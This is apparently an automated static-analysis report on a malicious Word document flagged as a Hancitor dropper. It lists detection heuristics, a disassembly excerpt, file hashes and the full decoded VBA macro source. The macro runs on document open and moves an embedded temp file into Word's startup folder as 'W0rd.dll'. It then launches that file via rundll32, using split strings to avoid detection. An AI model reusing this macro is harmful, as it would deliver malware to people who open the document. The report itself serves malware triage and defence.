Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d64568ebb71238b5…

MALICIOUS

Office (OLE)

Size: 373.5 KB
Created: 2021-01-25 13:14:00
Authoring application: Microsoft Office Word
First seen: 2021-02-20
MD5: ca5a993cb2c59999ef5c5c9b7dff2d03
SHA-1: b6e1a7a6bc3ecf04f32530397e9e5cb6c151fc06
SHA-256: d64568ebb71238b5367d1a4feb69ffd1492c36e320ce13698967dced10a0ef31
Risk Score: 470

Heuristics (13)

  • ClamAV: Doc.Dropper.Hancitor-9845854-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Hancitor-9845854-0
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • VBA macros detected medium (3 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Dim regsrva As New Shell32.Shell
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set fso = CreateObject("Scripting.FileSystemObject")
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • PEB access via FS segment (x86) high SC_PEB_ACCESS
    PEB access via FS segment (x86)
    Disassembly
    x86 disassembly · validity: code (0.984) — 10/10 branch targets land on an instruction boundary (100% coherence)
    0002AD75  64a130000000      mov eax, dword ptr fs:[0x30]
    0002AD7B  8b4068            mov eax, dword ptr [eax + 0x68]
    0002AD7E  c1e808            shr eax, 8
    0002AD81  a801              test al, 1
    0002AD83  7510              jne 0x2ad95
    0002AD85  ff7508            push dword ptr [ebp + 8]
    0002AD88  ff1518700210      call dword ptr [0x10027018]
    0002AD8E  50                push eax
    0002AD8F  ff151c700210      call dword ptr [0x1002701c]
    0002AD95  ff7508            push dword ptr [ebp + 8]
    0002AD98  e84f000000        call 0x2adec
    0002AD9D  59                pop ecx
    0002AD9E  ff7508            push dword ptr [ebp + 8]
    0002ADA1  ff15a0700210      call dword ptr [0x100270a0]
    0002ADA7  cc                int3
    0002ADA8  6a00              push 0
    0002ADAA  ff1540700210      call dword ptr [0x10027040]
    0002ADB0  8bc8              mov ecx, eax
    0002ADB2  85c9              test ecx, ecx
    0002ADB4  7503              jne 0x2adb9
    0002ADB6  32c0              xor al, al
    0002ADB8  c3                ret
    0002ADB9  b84d5a0000        mov eax, 0x5a4d
    0002ADBE  663901            cmp word ptr [ecx], ax
    0002ADC1  75f3              jne 0x2adb6
    0002ADC3  8b413c            mov eax, dword ptr [ecx + 0x3c]
    0002ADC6  03c1              add eax, ecx
    0002ADC8  813850450000      cmp dword ptr [eax], 0x4550
    0002ADCE  75e6              jne 0x2adb6
    0002ADD0  b90b010000        mov ecx, 0x10b
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Reference to GetProcAddress API high SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Reference to VirtualProtect API medium SC_STR_VIRTUALPROTECT
    Reference to VirtualProtect API
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (4)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4113 bytes
SHA-256: cafdc2ee8a7a23d3d0c4dd0063e2fcdbeca99b442351f658f5134779adad6302
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


Private Sub Document_Open()
Call stetptwwo
End Sub



Sub stetptwwo()

 Dim yy As String

Dim vxcv As Integer
Dim hugs As Integer
hugs = chek

Dim ede As String
If hugs = 1 Then
Else
Dim edef As String

Call hhhhh
Dim pushstr As String
pushstr = "\W" & "0rd.d"
Dim geto As String
Dim pus As String
pus = "xe"
geto = "nd"
Dim ter As String

Dim iof As String
iof = "3"
ter = "e"
Dim jsd As String
jsd = geto
 Dim hh As String
 hh = iof & "2." & ter & pus
 Dim fps As String
 fps = "r"
 Dim gpsa As String
 gpsa = "Unin"
 Dim fa As String
 fa = fps & "u" & jsd & "ll" & hh
 Dim glops As String
 glops = repid
Dim regsrva As New Shell32.Shell
yy = glops & yy & pushstr & "ll" & "," & gpsa & "stallFont"

Call regsrva.ShellExecute(fa, yy, " ", SW_SHOWNORMAL)
End If
End Sub


Attribute VB_Name = "Module1"
  


Function Getme(RootPath As String)
Dim hor As String

Dim fso As Object
Dim fld As Object
Dim vhhs As Object
Dim afs As String
Dim myArr
hor = repid
Dim asdf
Dim cheza As String

asdf = RootPath
Dim fer As String

Set fso = CreateObject("Scripting.FileSystemObject")

Set fld = fso.GetFolder(asdf)

strFileExists = Dir(RootPath & "\0fiasS.t" & "mp")
      If strFileExists = "" Then
    
For Each vhhs In fld.SUBFOLDERS


afs = vhhs

        Call checkthe(afs)
    myArr = Getme(vhhs.Path)


Next
    Set vhhs = Nothing
Getme = myArr
Set fld = Nothing
Set fso = Nothing



    Else
    Dim kurlbik As String
    kurlbik = hor
      If Dir(kurlbik & "\" & "W0rd.dll") = "" Then
      
     
   Call hi(RootPath)
      Else
      Exit Function
  End If
    
        End If


End Function





Function chek()
 Dim jsa As String

 jsa = repid
 Dim vzxx As String
 vzxx = jsa
 
 If Dir(vzxx & "\" & "W0rd.dll") = "" Then
 chek = 0
 Else

 chek = 1
 End If
End Function

Attribute VB_Name = "Module2"
Sub gotodown()
Call hhhss
   Selection.TypeBackspace
   Selection.Copy
   
End Sub


Sub hhhss()
Selection.MoveDown Unit:=wdLine, Count:=1
    Selection.MoveRight Unit:=wdCharacter, Count:=5
    Selection.MoveDown Unit:=wdLine, Count:=24
    Selection.MoveRight Unit:=wdCharacter, Count:=50
    Selection.MoveDown Unit:=wdLine, Count:=24
    Selection.MoveRight Unit:=wdCharacter, Count:=5
    Selection.MoveDown Unit:=wdLine, Count:=24
    Selection.MoveRight Unit:=wdCharacter, Count:=50
End Sub

Sub checkthe(sf As String)

Dim pafh As String
pafh = repid
strFileExists = Dir(sf & "\0fiasS.t" & "mp")
Dim ololow As String
ololow = sf
Dim nothings As String
nothings = pafh

      If strFileExists = "" Then
    
    Else
         If Dir(nothings & "\" & "W0rd.dll") = "" Then

        Name ololow & "\0fiasS.t" & "m" & "p" As ActiveDocument.Application.StartupPath & "\" & "W0rd.dll"
    Else
   Exit Sub
    End If
  
    End If
End Sub


Function repid()

repid = ActiveDocument.Application.StartupPath
End Function




Attribute VB_Name = "Module3"
Sub hhhhh()
Dim posl As String
posl = repid
Dim ntgs
Dim sda
Call gotodown
    ntgs = 50
sda = 49
Dim jos

While sda < 50
      ntgs = ntgs - 1
      
      If Dir(Left(posl, ntgs) & "Loc" & "al\Te" & "mp", vbDirectory) = "" Then
        
    Else
  
   sda = 61
    End If

   Wend
   Dim klas As String
   klas = posl
Call Getme(Left(klas, ntgs) & "Loc" & "al\Te" & "m" & "p")
  Selection.TypeBackspace
   

End Sub


Sub rnee(myhome As String, hsa As String)
Name myhome & "\" & "0fiasS.tm" & "p" As hsa
End Sub




Attribute VB_Name = "Module4"
Sub hi(myhome As String)
Dim glog As String
glog = repid
Dim hsa As String
hsa = glog & "\W0rd.dll"
Call rnee(myhome, hsa)
End Sub
embedded_office_00021e75.exe | embedded-pe | Office MZ+PE at offset 0x21E75 | 243595 bytes
SHA-256: 83a2c1632379d8106ab338df0e9e763e7ac672b0ec366300e1ecf98926f6b600
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: SC_PEB_ACCESS, SC_STR_VIRTUALPROTECT, SC_STR_GETPROCADDRESS
Static shellcode analysis recovered API/import strings: kernel32.dll, KERNEL32.DLL, VirtualProtect, GetProcAddress, ExitProcess
Carved macro source contains an auto-exec entry point and execution/download terms.
ole10native_00.bin | ole-package | OLE Ole10Native stream: ObjectPool/_1673056904/Ole10Native | 207681 bytes
SHA-256: 26d22d908f246c4f6e75ff0dee80bd01ed83313f2bac01b0a4e53ba36d1ae606
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: SC_PEB_ACCESS, SC_STR_VIRTUALPROTECT, SC_STR_GETPROCADDRESS
Static shellcode analysis recovered API/import strings: kernel32.dll, KERNEL32.DLL, VirtualProtect, GetProcAddress, ExitProcess
ole10native_00_0fiasS.tmp | ole-package-payload | OLE Ole10Native payload: ObjectPool/_1673056904/Ole10Native; display_name=0fiasS.tmp; full_path=C:\Users\MyPc\AppData\Local\Temp\0fiasS.tmp; temp_path=; def_file= | 207360 bytes
SHA-256: 633e229a0990882c4f9d247a096593b600b49f072b9b7075988f1afcc0d37a56
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: SC_PEB_ACCESS, SC_STR_VIRTUALPROTECT, SC_STR_GETPROCADDRESS
Static shellcode analysis recovered API/import strings: kernel32.dll, KERNEL32.DLL, VirtualProtect, GetProcAddress, ExitProcess